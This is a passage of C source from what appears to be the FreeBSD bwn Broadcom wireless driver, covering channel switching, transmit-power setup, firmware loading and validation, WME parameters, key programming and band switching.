BWN_HF_HW_POWERCTL); } static void bwn_phy_g_switch_chan(struct bwn_mac *mac, int channel, uint8_t spu) { struct bwn_softc *sc = mac->mac_sc; if (spu != 0) bwn_spu_workaround(mac, channel); BWN_WRITE_2(mac, BWN_CHANNEL, bwn_phy_g_chan2freq(channel)); if (channel == 14) { if (siba_sprom_get_ccode(sc->sc_dev) == SIBA_CCODE_JAPAN) bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_JAPAN_CHAN14_OFF); else bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_JAPAN_CHAN14_OFF); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, BWN_READ_2(mac, BWN_CHANNEL_EXT) | (1 << 11)); return; } BWN_WRITE_2(mac, BWN_CHANNEL_EXT, BWN_READ_2(mac, BWN_CHANNEL_EXT) & 0xf7bf); } static uint16_t bwn_phy_g_chan2freq(uint8_t channel) { static const uint8_t bwn_phy_g_rf_channels[] = BWN_PHY_G_RF_CHANNELS; KASSERT(channel >= 1 && channel <= 14, ("%s:%d: fail", __func__, __LINE__)); return (bwn_phy_g_rf_channels[channel - 1]); } static void bwn_phy_g_set_txpwr_sub(struct bwn_mac *mac, const struct bwn_bbatt *bbatt, const struct bwn_rfatt *rfatt, uint8_t txctl) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; uint16_t bb, rf; uint16_t tx_bias, tx_magn; bb = bbatt->att; rf = rfatt->att; tx_bias = lo->tx_bias; tx_magn = lo->tx_magn; if (tx_bias == 0xff) tx_bias = 0; pg->pg_txctl = txctl; memmove(&pg->pg_rfatt, rfatt, sizeof(*rfatt)); pg->pg_rfatt.padmix = (txctl & BWN_TXCTL_TXMIX) ? 1 : 0; memmove(&pg->pg_bbatt, bbatt, sizeof(*bbatt)); bwn_phy_g_set_bbatt(mac, bb); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_RADIO_ATT, rf); if (phy->rf_ver == 0x2050 && phy->rf_rev == 8) BWN_RF_WRITE(mac, 0x43, (rf & 0x000f) | (txctl & 0x0070)); else { BWN_RF_SETMASK(mac, 0x43, 0xfff0, (rf & 0x000f)); BWN_RF_SETMASK(mac, 0x52, ~0x0070, (txctl & 0x0070)); } if (BWN_HAS_TXMAG(phy)) BWN_RF_WRITE(mac, 0x52, tx_magn | tx_bias); else BWN_RF_SETMASK(mac, 0x52, 0xfff0, (tx_bias & 0x000f)); bwn_lo_g_adjust(mac); } static void bwn_phy_g_set_bbatt(struct bwn_mac *mac, uint16_t bbatt) { struct bwn_phy *phy = &mac->mac_phy; if (phy->analog == 0) { BWN_WRITE_2(mac, BWN_PHY0, (BWN_READ_2(mac, BWN_PHY0) & 0xfff0) | bbatt); return; } if (phy->analog > 1) { BWN_PHY_SETMASK(mac, BWN_PHY_DACCTL, 0xffc3, bbatt << 2); return; } BWN_PHY_SETMASK(mac, BWN_PHY_DACCTL, 0xff87, bbatt << 3); } static uint16_t bwn_rf_2050_rfoverval(struct bwn_mac *mac, uint16_t reg, uint32_t lpd) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; int max_lb_gain; uint16_t extlna; uint16_t i; if (phy->gmode == 0) return (0); if (BWN_HAS_LOOPBACK(phy)) { max_lb_gain = pg->pg_max_lb_gain; max_lb_gain += (phy->rf_rev == 8) ? 0x3e : 0x26; if (max_lb_gain >= 0x46) { extlna = 0x3000; max_lb_gain -= 0x46; } else if (max_lb_gain >= 0x3a) { extlna = 0x1000; max_lb_gain -= 0x3a; } else if (max_lb_gain >= 0x2e) { extlna = 0x2000; max_lb_gain -= 0x2e; } else { extlna = 0; max_lb_gain -= 0x10; } for (i = 0; i < 16; i++) { max_lb_gain -= (i * 6); if (max_lb_gain < 6) break; } if ((phy->rev < 7) || !(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA)) { if (reg == BWN_PHY_RFOVER) { return (0x1b3); } else if (reg == BWN_PHY_RFOVERVAL) { extlna |= (i << 8); switch (lpd) { case BWN_LPD(0, 1, 1): return (0x0f92); case BWN_LPD(0, 0, 1): case BWN_LPD(1, 0, 1): return (0x0092 | extlna); case BWN_LPD(1, 0, 0): return (0x0093 | extlna); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } else { if (reg == BWN_PHY_RFOVER) return (0x9b3); if (reg == BWN_PHY_RFOVERVAL) { if (extlna) extlna |= 0x8000; extlna |= (i << 8); switch (lpd) { case BWN_LPD(0, 1, 1): return (0x8f92); case BWN_LPD(0, 0, 1): return (0x8092 | extlna); case BWN_LPD(1, 0, 1): return (0x2092 | extlna); case BWN_LPD(1, 0, 0): return (0x2093 | extlna); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } return (0); } if ((phy->rev < 7) || !(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA)) { if (reg == BWN_PHY_RFOVER) { return (0x1b3); } else if (reg == BWN_PHY_RFOVERVAL) { switch (lpd) { case BWN_LPD(0, 1, 1): return (0x0fb2); case BWN_LPD(0, 0, 1): return (0x00b2); case BWN_LPD(1, 0, 1): return (0x30b2); case BWN_LPD(1, 0, 0): return (0x30b3); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } else { if (reg == BWN_PHY_RFOVER) { return (0x9b3); } else if (reg == BWN_PHY_RFOVERVAL) { switch (lpd) { case BWN_LPD(0, 1, 1): return (0x8fb2); case BWN_LPD(0, 0, 1): return (0x80b2); case BWN_LPD(1, 0, 1): return (0x20b2); case BWN_LPD(1, 0, 0): return (0x20b3); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } return (0); } static void bwn_spu_workaround(struct bwn_mac *mac, uint8_t channel) { if (mac->mac_phy.rf_ver != 0x2050 || mac->mac_phy.rf_rev >= 6) return; BWN_WRITE_2(mac, BWN_CHANNEL, (channel <= 10) ? bwn_phy_g_chan2freq(channel + 4) : bwn_phy_g_chan2freq(1)); DELAY(1000); BWN_WRITE_2(mac, BWN_CHANNEL, bwn_phy_g_chan2freq(channel)); } static int bwn_fw_gets(struct bwn_mac *mac, enum bwn_fwtype type) { struct bwn_softc *sc = mac->mac_sc; struct bwn_fw *fw = &mac->mac_fw; const uint8_t rev = siba_get_revid(sc->sc_dev); const char *filename; uint32_t high; int error; /* microcode */ if (rev >= 5 && rev <= 10) filename = "ucode5"; else if (rev >= 11 && rev <= 12) filename = "ucode11"; else if (rev == 13) filename = "ucode13"; else if (rev == 14) filename = "ucode14"; else if (rev >= 15) filename = "ucode15"; else { device_printf(sc->sc_dev, "no ucode for rev %d\n", rev); bwn_release_firmware(mac); return (EOPNOTSUPP); } error = bwn_fw_get(mac, type, filename, &fw->ucode); if (error) { bwn_release_firmware(mac); return (error); } /* PCM */ KASSERT(fw->no_pcmfile == 0, ("%s:%d fail", __func__, __LINE__)); if (rev >= 5 && rev <= 10) { error = bwn_fw_get(mac, type, "pcm5", &fw->pcm); if (error == ENOENT) fw->no_pcmfile = 1; else if (error) { bwn_release_firmware(mac); return (error); } } else if (rev < 11) { device_printf(sc->sc_dev, "no PCM for rev %d\n", rev); return (EOPNOTSUPP); } /* initvals */ high = siba_read_4(sc->sc_dev, SIBA_TGSHIGH); switch (mac->mac_phy.type) { case BWN_PHYTYPE_A: if (rev < 5 || rev > 10) goto fail1; if (high & BWN_TGSHIGH_HAVE_2GHZ) filename = "a0g1initvals5"; else filename = "a0g0initvals5"; break; case BWN_PHYTYPE_G: if (rev >= 5 && rev <= 10) filename = "b0g0initvals5"; else if (rev >= 13) filename = "b0g0initvals13"; else goto fail1; break; case BWN_PHYTYPE_LP: if (rev == 13) filename = "lp0initvals13"; else if (rev == 14) filename = "lp0initvals14"; else if (rev >= 15) filename = "lp0initvals15"; else goto fail1; break; case BWN_PHYTYPE_N: if (rev >= 11 && rev <= 12) filename = "n0initvals11"; else goto fail1; break; default: goto fail1; } error = bwn_fw_get(mac, type, filename, &fw->initvals); if (error) { bwn_release_firmware(mac); return (error); } /* bandswitch initvals */ switch (mac->mac_phy.type) { case BWN_PHYTYPE_A: if (rev >= 5 && rev <= 10) { if (high & BWN_TGSHIGH_HAVE_2GHZ) filename = "a0g1bsinitvals5"; else filename = "a0g0bsinitvals5"; } else if (rev >= 11) filename = NULL; else goto fail1; break; case BWN_PHYTYPE_G: if (rev >= 5 && rev <= 10) filename = "b0g0bsinitvals5"; else if (rev >= 11) filename = NULL; else goto fail1; break; case BWN_PHYTYPE_LP: if (rev == 13) filename = "lp0bsinitvals13"; else if (rev == 14) filename = "lp0bsinitvals14"; else if (rev >= 15) filename = "lp0bsinitvals15"; else goto fail1; break; case BWN_PHYTYPE_N: if (rev >= 11 && rev <= 12) filename = "n0bsinitvals11"; else goto fail1; break; default: goto fail1; } error = bwn_fw_get(mac, type, filename, &fw->initvals_band); if (error) { bwn_release_firmware(mac); return (error); } return (0); fail1: device_printf(sc->sc_dev, "no INITVALS for rev %d\n", rev); bwn_release_firmware(mac); return (EOPNOTSUPP); } static int bwn_fw_get(struct bwn_mac *mac, enum bwn_fwtype type, const char *name, struct bwn_fwfile *bfw) { const struct bwn_fwhdr *hdr; struct bwn_softc *sc = mac->mac_sc; const struct firmware *fw; char namebuf[64]; if (name == NULL) { bwn_do_release_fw(bfw); return (0); } if (bfw->filename != NULL) { if (bfw->type == type && (strcmp(bfw->filename, name) == 0)) return (0); bwn_do_release_fw(bfw); } snprintf(namebuf, sizeof(namebuf), "bwn%s_v4_%s%s", (type == BWN_FWTYPE_OPENSOURCE) ? "-open" : "", (mac->mac_phy.type == BWN_PHYTYPE_LP) ? "lp_" : "", name); /* XXX Sleeping on "fwload" with the non-sleepable locks held */ fw = firmware_get(namebuf); if (fw == NULL) { device_printf(sc->sc_dev, "the fw file(%s) not found\n", namebuf); return (ENOENT); } if (fw->datasize < sizeof(struct bwn_fwhdr)) goto fail; hdr = (const struct bwn_fwhdr *)(fw->data); switch (hdr->type) { case BWN_FWTYPE_UCODE: case BWN_FWTYPE_PCM: if (be32toh(hdr->size) != (fw->datasize - sizeof(struct bwn_fwhdr))) goto fail; /* FALLTHROUGH */ case BWN_FWTYPE_IV: if (hdr->ver != 1) goto fail; break; default: goto fail; } bfw->filename = name; bfw->fw = fw; bfw->type = type; return (0); fail: device_printf(sc->sc_dev, "the fw file(%s) format error\n", namebuf); if (fw != NULL) firmware_put(fw, FIRMWARE_UNLOAD); return (EPROTO); } static void bwn_release_firmware(struct bwn_mac *mac) { bwn_do_release_fw(&mac->mac_fw.ucode); bwn_do_release_fw(&mac->mac_fw.pcm); bwn_do_release_fw(&mac->mac_fw.initvals); bwn_do_release_fw(&mac->mac_fw.initvals_band); } static void bwn_do_release_fw(struct bwn_fwfile *bfw) { if (bfw->fw != NULL) firmware_put(bfw->fw, FIRMWARE_UNLOAD); bfw->fw = NULL; bfw->filename = NULL; } static int bwn_fw_loaducode(struct bwn_mac *mac) { #define GETFWOFFSET(fwp, offset) \ ((const uint32_t *)((const char *)fwp.fw->data + offset)) #define GETFWSIZE(fwp, offset) \ ((fwp.fw->datasize - offset) / sizeof(uint32_t)) struct bwn_softc *sc = mac->mac_sc; const uint32_t *data; unsigned int i; uint32_t ctl; uint16_t date, fwcaps, time; int error = 0; ctl = BWN_READ_4(mac, BWN_MACCTL); ctl |= BWN_MACCTL_MCODE_JMP0; KASSERT(!(ctl & BWN_MACCTL_MCODE_RUN), ("%s:%d: fail", __func__, __LINE__)); BWN_WRITE_4(mac, BWN_MACCTL, ctl); for (i = 0; i < 64; i++) bwn_shm_write_2(mac, BWN_SCRATCH, i, 0); for (i = 0; i < 4096; i += 2) bwn_shm_write_2(mac, BWN_SHARED, i, 0); data = GETFWOFFSET(mac->mac_fw.ucode, sizeof(struct bwn_fwhdr)); bwn_shm_ctlword(mac, BWN_UCODE | BWN_SHARED_AUTOINC, 0x0000); for (i = 0; i < GETFWSIZE(mac->mac_fw.ucode, sizeof(struct bwn_fwhdr)); i++) { BWN_WRITE_4(mac, BWN_SHM_DATA, be32toh(data[i])); DELAY(10); } if (mac->mac_fw.pcm.fw) { data = GETFWOFFSET(mac->mac_fw.pcm, sizeof(struct bwn_fwhdr)); bwn_shm_ctlword(mac, BWN_HW, 0x01ea); BWN_WRITE_4(mac, BWN_SHM_DATA, 0x00004000); bwn_shm_ctlword(mac, BWN_HW, 0x01eb); for (i = 0; i < GETFWSIZE(mac->mac_fw.pcm, sizeof(struct bwn_fwhdr)); i++) { BWN_WRITE_4(mac, BWN_SHM_DATA, be32toh(data[i])); DELAY(10); } } BWN_WRITE_4(mac, BWN_INTR_REASON, BWN_INTR_ALL); BWN_WRITE_4(mac, BWN_MACCTL, (BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_MCODE_JMP0) | BWN_MACCTL_MCODE_RUN); for (i = 0; i < 21; i++) { if (BWN_READ_4(mac, BWN_INTR_REASON) == BWN_INTR_MAC_SUSPENDED) break; if (i >= 20) { device_printf(sc->sc_dev, "ucode timeout\n"); error = ENXIO; goto error; } DELAY(50000); } BWN_READ_4(mac, BWN_INTR_REASON); mac->mac_fw.rev = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_REV); if (mac->mac_fw.rev <= 0x128) { device_printf(sc->sc_dev, "the firmware is too old\n"); error = EOPNOTSUPP; goto error; } mac->mac_fw.patch = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_PATCH); date = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_DATE); mac->mac_fw.opensource = (date == 0xffff); if (bwn_wme != 0) mac->mac_flags |= BWN_MAC_FLAG_WME; mac->mac_flags |= BWN_MAC_FLAG_HWCRYPTO; time = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_TIME); if (mac->mac_fw.opensource == 0) { device_printf(sc->sc_dev, "firmware version (rev %u patch %u date %#x time %#x)\n", mac->mac_fw.rev, mac->mac_fw.patch, date, time); if (mac->mac_fw.no_pcmfile) device_printf(sc->sc_dev, "no HW crypto acceleration due to pcm5\n"); } else { mac->mac_fw.patch = time; fwcaps = bwn_fwcaps_read(mac); if (!(fwcaps & BWN_FWCAPS_HWCRYPTO) || mac->mac_fw.no_pcmfile) { device_printf(sc->sc_dev, "disabling HW crypto acceleration\n"); mac->mac_flags &= ~BWN_MAC_FLAG_HWCRYPTO; } if (!(fwcaps & BWN_FWCAPS_WME)) { device_printf(sc->sc_dev, "disabling WME support\n"); mac->mac_flags &= ~BWN_MAC_FLAG_WME; } } if (BWN_ISOLDFMT(mac)) device_printf(sc->sc_dev, "using old firmware image\n"); return (0); error: BWN_WRITE_4(mac, BWN_MACCTL, (BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_MCODE_RUN) | BWN_MACCTL_MCODE_JMP0); return (error); #undef GETFWSIZE #undef GETFWOFFSET } /* OpenFirmware only */ static uint16_t bwn_fwcaps_read(struct bwn_mac *mac) { KASSERT(mac->mac_fw.opensource == 1, ("%s:%d: fail", __func__, __LINE__)); return (bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_FWCAPS)); } static int bwn_fwinitvals_write(struct bwn_mac *mac, const struct bwn_fwinitvals *ivals, size_t count, size_t array_size) { #define GET_NEXTIV16(iv) \ ((const struct bwn_fwinitvals *)((const uint8_t *)(iv) + \ sizeof(uint16_t) + sizeof(uint16_t))) #define GET_NEXTIV32(iv) \ ((const struct bwn_fwinitvals *)((const uint8_t *)(iv) + \ sizeof(uint16_t) + sizeof(uint32_t))) struct bwn_softc *sc = mac->mac_sc; const struct bwn_fwinitvals *iv; uint16_t offset; size_t i; uint8_t bit32; KASSERT(sizeof(struct bwn_fwinitvals) == 6, ("%s:%d: fail", __func__, __LINE__)); iv = ivals; for (i = 0; i < count; i++) { if (array_size < sizeof(iv->offset_size)) goto fail; array_size -= sizeof(iv->offset_size); offset = be16toh(iv->offset_size); bit32 = (offset & BWN_FWINITVALS_32BIT) ? 1 : 0; offset &= BWN_FWINITVALS_OFFSET_MASK; if (offset >= 0x1000) goto fail; if (bit32) { if (array_size < sizeof(iv->data.d32)) goto fail; array_size -= sizeof(iv->data.d32); BWN_WRITE_4(mac, offset, be32toh(iv->data.d32)); iv = GET_NEXTIV32(iv); } else { if (array_size < sizeof(iv->data.d16)) goto fail; array_size -= sizeof(iv->data.d16); BWN_WRITE_2(mac, offset, be16toh(iv->data.d16)); iv = GET_NEXTIV16(iv); } } if (array_size != 0) goto fail; return (0); fail: device_printf(sc->sc_dev, "initvals: invalid format\n"); return (EPROTO); #undef GET_NEXTIV16 #undef GET_NEXTIV32 } static int bwn_switch_channel(struct bwn_mac *mac, int chan) { struct bwn_phy *phy = &(mac->mac_phy); struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t channelcookie, savedcookie; int error; if (chan == 0xffff) chan = phy->get_default_chan(mac); channelcookie = chan; if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) channelcookie |= 0x100; savedcookie = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_CHAN); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_CHAN, channelcookie); error = phy->switch_channel(mac, chan); if (error) goto fail; mac->mac_phy.chan = chan; DELAY(8000); return (0); fail: device_printf(sc->sc_dev, "failed to switch channel\n"); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_CHAN, savedcookie); return (error); } static uint16_t bwn_ant2phy(int antenna) { switch (antenna) { case BWN_ANT0: return (BWN_TX_PHY_ANT0); case BWN_ANT1: return (BWN_TX_PHY_ANT1); case BWN_ANT2: return (BWN_TX_PHY_ANT2); case BWN_ANT3: return (BWN_TX_PHY_ANT3); case BWN_ANTAUTO: return (BWN_TX_PHY_ANT01AUTO); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static void bwn_wme_load(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int i; KASSERT(N(bwn_wme_shm_offsets) == N(sc->sc_wmeParams), ("%s:%d: fail", __func__, __LINE__)); bwn_mac_suspend(mac); for (i = 0; i < N(sc->sc_wmeParams); i++) bwn_wme_loadparams(mac, &(sc->sc_wmeParams[i]), bwn_wme_shm_offsets[i]); bwn_mac_enable(mac); } static void bwn_wme_loadparams(struct bwn_mac *mac, const struct wmeParams *p, uint16_t shm_offset) { #define SM(_v, _f) (((_v) << _f##_S) & _f) struct bwn_softc *sc = mac->mac_sc; uint16_t params[BWN_NR_WMEPARAMS]; int slot, tmp; unsigned int i; slot = BWN_READ_2(mac, BWN_RNG) & SM(p->wmep_logcwmin, WME_PARAM_LOGCWMIN); memset(¶ms, 0, sizeof(params)); DPRINTF(sc, BWN_DEBUG_WME, "wmep_txopLimit %d wmep_logcwmin %d " "wmep_logcwmax %d wmep_aifsn %d\n", p->wmep_txopLimit, p->wmep_logcwmin, p->wmep_logcwmax, p->wmep_aifsn); params[BWN_WMEPARAM_TXOP] = p->wmep_txopLimit * 32; params[BWN_WMEPARAM_CWMIN] = SM(p->wmep_logcwmin, WME_PARAM_LOGCWMIN); params[BWN_WMEPARAM_CWMAX] = SM(p->wmep_logcwmax, WME_PARAM_LOGCWMAX); params[BWN_WMEPARAM_CWCUR] = SM(p->wmep_logcwmin, WME_PARAM_LOGCWMIN); params[BWN_WMEPARAM_AIFS] = p->wmep_aifsn; params[BWN_WMEPARAM_BSLOTS] = slot; params[BWN_WMEPARAM_REGGAP] = slot + p->wmep_aifsn; for (i = 0; i < N(params); i++) { if (i == BWN_WMEPARAM_STATUS) { tmp = bwn_shm_read_2(mac, BWN_SHARED, shm_offset + (i * 2)); tmp |= 0x100; bwn_shm_write_2(mac, BWN_SHARED, shm_offset + (i * 2), tmp); } else { bwn_shm_write_2(mac, BWN_SHARED, shm_offset + (i * 2), params[i]); } } } static void bwn_mac_write_bssid(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t tmp; int i; uint8_t mac_bssid[IEEE80211_ADDR_LEN * 2]; bwn_mac_setfilter(mac, BWN_MACFILTER_BSSID, sc->sc_bssid); memcpy(mac_bssid, sc->sc_macaddr, IEEE80211_ADDR_LEN); memcpy(mac_bssid + IEEE80211_ADDR_LEN, sc->sc_bssid, IEEE80211_ADDR_LEN); for (i = 0; i < N(mac_bssid); i += sizeof(uint32_t)) { tmp = (uint32_t) (mac_bssid[i + 0]); tmp |= (uint32_t) (mac_bssid[i + 1]) << 8; tmp |= (uint32_t) (mac_bssid[i + 2]) << 16; tmp |= (uint32_t) (mac_bssid[i + 3]) << 24; bwn_ram_write(mac, 0x20 + i, tmp); } } static void bwn_mac_setfilter(struct bwn_mac *mac, uint16_t offset, const uint8_t *macaddr) { static const uint8_t zero[IEEE80211_ADDR_LEN] = { 0 }; uint16_t data; if (!mac) macaddr = zero; offset |= 0x0020; BWN_WRITE_2(mac, BWN_MACFILTER_CONTROL, offset); data = macaddr[0]; data |= macaddr[1] << 8; BWN_WRITE_2(mac, BWN_MACFILTER_DATA, data); data = macaddr[2]; data |= macaddr[3] << 8; BWN_WRITE_2(mac, BWN_MACFILTER_DATA, data); data = macaddr[4]; data |= macaddr[5] << 8; BWN_WRITE_2(mac, BWN_MACFILTER_DATA, data); } static void bwn_key_dowrite(struct bwn_mac *mac, uint8_t index, uint8_t algorithm, const uint8_t *key, size_t key_len, const uint8_t *mac_addr) { uint8_t buf[BWN_SEC_KEYSIZE] = { 0, }; uint8_t per_sta_keys_start = 8; if (BWN_SEC_NEWAPI(mac)) per_sta_keys_start = 4; KASSERT(index < mac->mac_max_nr_keys, ("%s:%d: fail", __func__, __LINE__)); KASSERT(key_len <= BWN_SEC_KEYSIZE, ("%s:%d: fail", __func__, __LINE__)); if (index >= per_sta_keys_start) bwn_key_macwrite(mac, index, NULL); if (key) memcpy(buf, key, key_len); bwn_key_write(mac, index, algorithm, buf); if (index >= per_sta_keys_start) bwn_key_macwrite(mac, index, mac_addr); mac->mac_key[index].algorithm = algorithm; } static void bwn_key_macwrite(struct bwn_mac *mac, uint8_t index, const uint8_t *addr) { struct bwn_softc *sc = mac->mac_sc; uint32_t addrtmp[2] = { 0, 0 }; uint8_t start = 8; if (BWN_SEC_NEWAPI(mac)) start = 4; KASSERT(index >= start, ("%s:%d: fail", __func__, __LINE__)); index -= start; if (addr) { addrtmp[0] = addr[0]; addrtmp[0] |= ((uint32_t) (addr[1]) << 8); addrtmp[0] |= ((uint32_t) (addr[2]) << 16); addrtmp[0] |= ((uint32_t) (addr[3]) << 24); addrtmp[1] = addr[4]; addrtmp[1] |= ((uint32_t) (addr[5]) << 8); } if (siba_get_revid(sc->sc_dev) >= 5) { bwn_shm_write_4(mac, BWN_RCMTA, (index * 2) + 0, addrtmp[0]); bwn_shm_write_2(mac, BWN_RCMTA, (index * 2) + 1, addrtmp[1]); } else { if (index >= 8) { bwn_shm_write_4(mac, BWN_SHARED, BWN_SHARED_PSM + (index * 6) + 0, addrtmp[0]); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PSM + (index * 6) + 4, addrtmp[1]); } } } static void bwn_key_write(struct bwn_mac *mac, uint8_t index, uint8_t algorithm, const uint8_t *key) { unsigned int i; uint32_t offset; uint16_t kidx, value; kidx = BWN_SEC_KEY2FW(mac, index); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_KEYIDX_BLOCK + (kidx * 2), (kidx << 4) | algorithm); offset = mac->mac_ktp + (index * BWN_SEC_KEYSIZE); for (i = 0; i < BWN_SEC_KEYSIZE; i += 2) { value = key[i]; value |= (uint16_t)(key[i + 1]) << 8; bwn_shm_write_2(mac, BWN_SHARED, offset + i, value); } } static void bwn_phy_exit(struct bwn_mac *mac) { mac->mac_phy.rf_onoff(mac, 0); if (mac->mac_phy.exit != NULL) mac->mac_phy.exit(mac); } static void bwn_dma_free(struct bwn_mac *mac) { struct bwn_dma *dma; if ((mac->mac_flags & BWN_MAC_FLAG_DMA) == 0) return; dma = &mac->mac_method.dma; bwn_dma_ringfree(&dma->rx); bwn_dma_ringfree(&dma->wme[WME_AC_BK]); bwn_dma_ringfree(&dma->wme[WME_AC_BE]); bwn_dma_ringfree(&dma->wme[WME_AC_VI]); bwn_dma_ringfree(&dma->wme[WME_AC_VO]); bwn_dma_ringfree(&dma->mcast); } static void bwn_core_stop(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; BWN_ASSERT_LOCKED(sc); if (mac->mac_status < BWN_MAC_STATUS_STARTED) return; callout_stop(&sc->sc_rfswitch_ch); callout_stop(&sc->sc_task_ch); callout_stop(&sc->sc_watchdog_ch); sc->sc_watchdog_timer = 0; BWN_WRITE_4(mac, BWN_INTR_MASK, 0); BWN_READ_4(mac, BWN_INTR_MASK); bwn_mac_suspend(mac); mac->mac_status = BWN_MAC_STATUS_INITED; } static int bwn_switch_band(struct bwn_softc *sc, struct ieee80211_channel *chan) { struct bwn_mac *up_dev = NULL; struct bwn_mac *down_dev; struct bwn_mac *mac; int err, status; uint8_t gmode; BWN_ASSERT_LOCKED(sc); TAILQ_FOREACH(mac, &sc->sc_maclist, mac_list) { if (IEEE80211_IS_CHAN_2GHZ(chan) && mac->mac_phy.supports_2ghz) { up_dev = mac; gmode = 1; } else if (IEEE80211_IS_CHAN_5GHZ(chan) && mac->mac_phy.supports_5ghz) { up_dev = mac; gmode = 0; } else { KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (EINVAL); } if (up_dev != NULL) break; } if (up_dev == NULL) { device_printf(sc->sc_dev, "Could not find a device\n"); return (ENODEV); } if (up_dev == sc->sc_curmac && sc->sc_curmac->mac_phy.gmode == gmode) return (0); device_printf(sc->sc_dev, "switching to %s-GHz band\n", IEEE80211_IS_CHAN_2GHZ(chan) ? "2" : "5"); down_dev = sc->sc_curmac; status = down_dev->mac_status; if (status >= BWN_MAC_STATUS_STARTED) bwn_core_stop(down_dev); if (status >= BWN_MAC_STATUS_INITED) bwn_core_exit(down_dev); if (down_dev != up_dev) bwn_phy_reset(down_dev); up_dev->mac_phy.gmode = gmode; if (status >= BWN_MAC_STATUS_INITED) { err = bwn_core_init(up_dev); if (err) { device_printf(sc->sc_dev, "fatal: failed to initialize for %s-GHz\n", IEEE80211_IS_CHAN_2GHZ(chan) ? "2" : "5"); goto fail; } } if (status >= BWN_MAC_STATUS_STARTED) bwn_core_start(up_dev); KASSERT(up_dev->mac_status == status, ("%s: fail", __func__)); sc->sc_curmac = up_dev; return (0); fail: sc->sc_curmac = NULL; return (err); } static void bwn_rf_turnon(struct bwn_mac *mac) { bwn_mac_suspend(mac); mac->mac_phy.rf_onoff(mac, 1); mac->mac_phy.rf_on = 1; bwn_mac_enable(mac); } static void bwn_rf_turnoff(struct bwn_mac *mac) { bwn_mac_suspend(mac); mac->mac_phy.rf_onoff(mac, 0); mac->mac_phy.rf_on = 0; bwn_mac_enable(mac); } static void bwn_phy_reset(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; siba_write_4(sc->sc_dev, SIBA_TGSLOW, ((siba_read_4(sc->sc_dev, SIBA_TGSLOW) & ~BWN_TGSLOW_SUPPORT_G) | BWN_TGSLOW_PHYRESET) | SIBA_TGSLOW_FGC); DELAY(1000); siba_write_4(sc->sc_dev, SIBA_TGSLOW, (siba_read_4(sc->sc_dev, SIBA_TGSLOW) & ~SIBA_TGSLOW_FGC) | BWN_TGSLOW_PHYRESET); DELAY(1000); } static int bwn_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct bwn_vap *bvp = BWN_VAP(vap); struct ieee80211com *ic= vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; enum ieee80211_state ostate = vap->iv_state; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; int error; DPRINTF(sc, BWN_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); error = bvp->bv_newstate(vap, nstate, arg); if (error != 0) return (error); BWN_LOCK(sc); bwn_led_newstate(mac, nstate); /* * Clear the BSSID when we stop a STA */ if (vap->iv_opmode == IEEE80211_M_STA) { if (ostate == IEEE80211_S_RUN && nstate != IEEE80211_S_RUN) { /* * Clear out the BSSID. If we reassociate to * the same AP, this will reinialize things * correctly... */ if (ic->ic_opmode == IEEE80211_M_STA && (sc->sc_flags & BWN_FLAG_INVALID) == 0) { memset(sc->sc_bssid, 0, IEEE80211_ADDR_LEN); bwn_set_macaddr(mac); } } } if (vap->iv_opmode == IEEE80211_M_MONITOR || vap->iv_opmode == IEEE80211_M_AHDEMO) { /* XXX nothing to do? */ } else if (nstate == IEEE80211_S_RUN) { memcpy(sc->sc_bssid, vap->iv_bss->ni_bssid, IEEE80211_ADDR_LEN); memcpy(sc->sc_macaddr, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); bwn_set_opmode(mac); bwn_set_pretbtt(mac); bwn_spu_setdelay(mac, 0); bwn_set_macaddr(mac); } BWN_UNLOCK(sc); return (error); } static void bwn_set_pretbtt(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint16_t pretbtt; if (ic->ic_opmode == 